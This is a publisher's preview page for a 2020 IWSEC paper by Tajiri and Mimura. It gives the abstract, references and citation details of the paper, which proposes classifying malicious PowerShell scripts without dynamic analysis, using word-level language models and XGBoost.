Detection of Malicious PowerShell Using Word-Level Language Models

Tajiri, Yui; Mimura, Mamoru

doi:10.1007/978-3-030-58208-1_3

Part of the book series: Lecture Notes in Computer Science ((LNSC,volume 12231))

Included in the following conference series:

International Workshop on Security

4 Citations

Abstract

There is a growing tendency for cybercriminals to abuse legitimate tools installed on the target computers for cyberattacks. In particular, the use of PowerShell provided by Microsoft has been increasing every year and has become a threat. In previous studies, a method to detect malicious PowerShell commands using character-level deep learning was proposed. The proposed method combines traditional natural language processing and character-level convolutional neural networks. This method, however, requires time for dynamic analysis. This paper proposes a method to classify unknown PowerShell without dynamic analysis. Our method uses feature vectors extracted from malicious and benign PowerShell scripts using word-level language models for classification. The datasets were generated from benign and malicious PowerShell scripts obtained from Hybrid Analysis, and benign PowerShell scripts obtained from GitHub, which are imbalanced. The experimental result shows that the combination of the LSI and XGBoost produces the highest detection rate. The maximum accuracy achieves approximately 0.95 on the imbalanced dataset. Furthermore, over 50% of unknown malicious PowerShell scripts could be detected in time series analysis without dynamic analysis.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Log in via an institution

Chapter: USD 29.95; Price excludes VAT (USA)

eBook: USD 39.99; Price excludes VAT (USA)

Softcover Book: USD 54.99; Price excludes VAT (USA)

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

References

GitHub. https://github.co.jp/
Hybrid Analysis. https://www.hybrid-analysis.com/
Powerdrive. https://github.com/denisugarte/PowerDrive
Virus Total. https://www.virustotal.com/
Breiman, L.: Random forests. Mach. Learn. 45(1), 5–32 (2001). https://doi.org/10.1023/A:1010933404324
Article MATH Google Scholar
Chang, C., Lin, C.: LIBSVM: a library for support vector machines. ACM Trans. Intell. Syst. Technol. 2, 27:1–27:27 (2011). https://doi.org/10.1145/1961189.1961199
Article Google Scholar
Chen, T., Guestrin, C.: XGBoost: a scalable tree boosting system. In: Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, San Francisco, CA, USA, August 13–17, 2016, pp. 785–794 (2016). https://doi.org/10.1145/2939672.2939785
Deerwester, S.C., Dumais, S.T., Landauer, T.K., Furnas, G.W., Harshman, R.A.: Indexing by latent semantic analysis. JASIS 41(6), 391–407 (1990). https://doi.org/10.1002/(SICI)1097-4571(199009)41:6<391::AID-ASI1>3.0.CO;2-9
Article Google Scholar
Hendler, D., Kels, S., Rubin, A.: Detecting malicious PowerShell commands using deep neural networks. In: Proceedings of the 2018 on Asia Conference on Computer and Communications Security, AsiaCCS 2018, Incheon, Republic of Korea, June 04–08, 2018, pp. 187–197 (2018). https://doi.org/10.1145/3196494.3196511
Ito, R., Mimura, M.: Detecting unknown malware from ASCII strings with natural language processing techniques. In: 2019 14th Asia Joint Conference on Information Security (AsiaJCIS), pp. 1–8 (2019)
Google Scholar
Le, Q.V., Mikolov, T.: Distributed representations of sentences and documents. In: Proceedings of the 31th International Conference on Machine Learning, ICML 2014, Beijing, China, 21–26 June 2014, pp. 1188–1196 (2014). http://proceedings.mlr.press/v32/le14.html
McAfee: McAfee labs threats report August 2019 (August 2019). https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-aug-2019.pdf
Mikolov, T., Chen, K., Corrado, G., Dean, J.: Efficient estimation of word representations in vector space. In: 1st International Conference on Learning Representations, ICLR 2013, Scottsdale, Arizona, USA, May 2–4, 2013, Workshop Track Proceedings (2013). http://arxiv.org/abs/1301.3781
Mimura, M., Suga, Y.: Filtering malicious JavaScript code with doc2vec on an imbalanced dataset. In: 2019 14th Asia Joint Conference on Information Security (AsiaJCIS), pp. 24–31 (2019)
Google Scholar
Mimura, M., Miura, H.: Detecting unseen malicious VBA macros with NLP techniques. JIP 27, 555–563 (2019). https://doi.org/10.2197/ipsjjip.27.555
Article Google Scholar
Mimura, M., Ohminami, T.: Towards efficient detection of malicious VBA macros with LSI. In: Attrapadung, N., Yagi, T. (eds.) IWSEC 2019. LNCS, vol. 11689, pp. 168–185. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-26834-3_10
Chapter Google Scholar
Mimura, M., Ohminami, T.: Using LSI to detect unknown malicious VBA macros. J. Inf. Process. 28 (2020)
Google Scholar
Miura, H., Mimura, M., Tanaka, H.: Macros finder: do you remember LOVELETTER? In: Su, C., Kikuchi, H. (eds.) ISPEC 2018. LNCS, vol. 11125, pp. 3–18. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-99807-7_1
Chapter Google Scholar
Ndichu, S., Kim, S., Ozawa, S., Misu, T., Makishima, K.: A machine learning approach to detection of JavaScript-based attacks using AST features and paragraph vectors. Appl. Soft Comput. 84, 105721 (2019). https://doi.org/10.1016/j.asoc.2019.105721
Article Google Scholar
Pedregosa, F., et al.: Scikit-learn: machine learning in Python. J. Mach. Learn. Res. 12, 2825–2830 (2011). http://dl.acm.org/citation.cfm?id=2078195
MathSciNet MATH Google Scholar
Rubin, A., Kels, S., Hendler, D.: AMSI-based detection of malicious PowerShell code using contextual embeddings. arXiv e-prints arXiv:1905.09538 (May 2019)
Rusak, G., Al-Dujaili, A., O’Reilly, U.: AST-based deep learning for detecting malicious PowerShell. In: Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security, CCS 2018, Toronto, ON, Canada, October 15–19, 2018, pp. 2276–2278 (2018). https://doi.org/10.1145/3243734.3278496
Symantec: Symantec 2019 Internet security threat report (February 2019). https://docs.broadcom.com/docs/istr-24-2019-en
Ugarte, D., Maiorca, D., Cara, F., Giacinto, G.: PowerDrive: accurate de-obfuscation and analysis of PowerShell malware. In: Perdisci, R., Maurice, C., Giacinto, G., Almgren, M. (eds.) DIMVA 2019. LNCS, vol. 11543, pp. 240–259. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-22038-9_12
Chapter Google Scholar

Download references

Author information

Authors and Affiliations

National Defense Academy, Yokosuka, Japan
Yui Tajiri & Mamoru Mimura

Authors

Yui Tajiri
View author publications
You can also search for this author in PubMed Google Scholar
Mamoru Mimura
View author publications
You can also search for this author in PubMed Google Scholar

Corresponding author

Correspondence to Yui Tajiri .

Editor information

Editors and Affiliations

Bunkyo University, Chigasaki, Japan
Kazumaro Aoki
Toho University, Funabashi, Japan
Akira Kanaoka

Rights and permissions

Reprints and permissions

Copyright information

About this paper

Cite this paper

Tajiri, Y., Mimura, M. (2020). Detection of Malicious PowerShell Using Word-Level Language Models. In: Aoki, K., Kanaoka, A. (eds) Advances in Information and Computer Security. IWSEC 2020. Lecture Notes in Computer Science(), vol 12231. Springer, Cham. https://doi.org/10.1007/978-3-030-58208-1_3

Download citation

DOI: https://doi.org/10.1007/978-3-030-58208-1_3
Published: 26 August 2020
Publisher Name: Springer, Cham
Print ISBN: 978-3-030-58207-4
Online ISBN: 978-3-030-58208-1
eBook Packages: Computer ScienceComputer Science (R0)

Publish with us

Policies and ethics